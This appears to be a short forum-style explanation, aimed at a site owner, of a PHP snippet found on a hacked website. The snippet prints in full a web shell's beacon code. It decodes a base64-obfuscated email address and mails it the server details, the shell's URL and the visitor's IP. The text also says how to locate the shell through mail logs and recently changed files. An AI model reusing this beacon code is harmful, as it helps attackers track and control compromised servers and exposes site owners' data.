This piece of php code sends a message to [email protected] (it is encoded in "cG9ydG92amFja0BnbWFpbC5jb20=") about the successful installation of the shell on the site.
As you can see from the $body message, the PHP shell itself is located in the http:// $web$path module , look for this letter in the mail server logs, it was sent via the hoster's mailer.
Or look at the latest dates of changes in the php-files of the site engine - the shell itself is there.

$web = $_SERVER["HTTP_HOST"];
$path = $_SERVER["REQUEST_URI"];
$ip = $_SERVER["REMOTE_ADDR"];
$contact = base64_decode("cG9ydG92amFja0BnbWFpbC5jb20=");
$body = "\nUname: ".php_uname()."\nPath Dir: ".$cwd = getcwd()."\nMessage:\n"."\nE-Path: ".htmlspecialchars($_SERVER['REQUEST_URI'])."\nE-Domain: ".htmlspecialchars($_SERVER["SERVER_NAME"])."\nShell: http://$web$path\n\nIP: $ip";
mail("$contact","Result Shell in [http://$web]", "$body");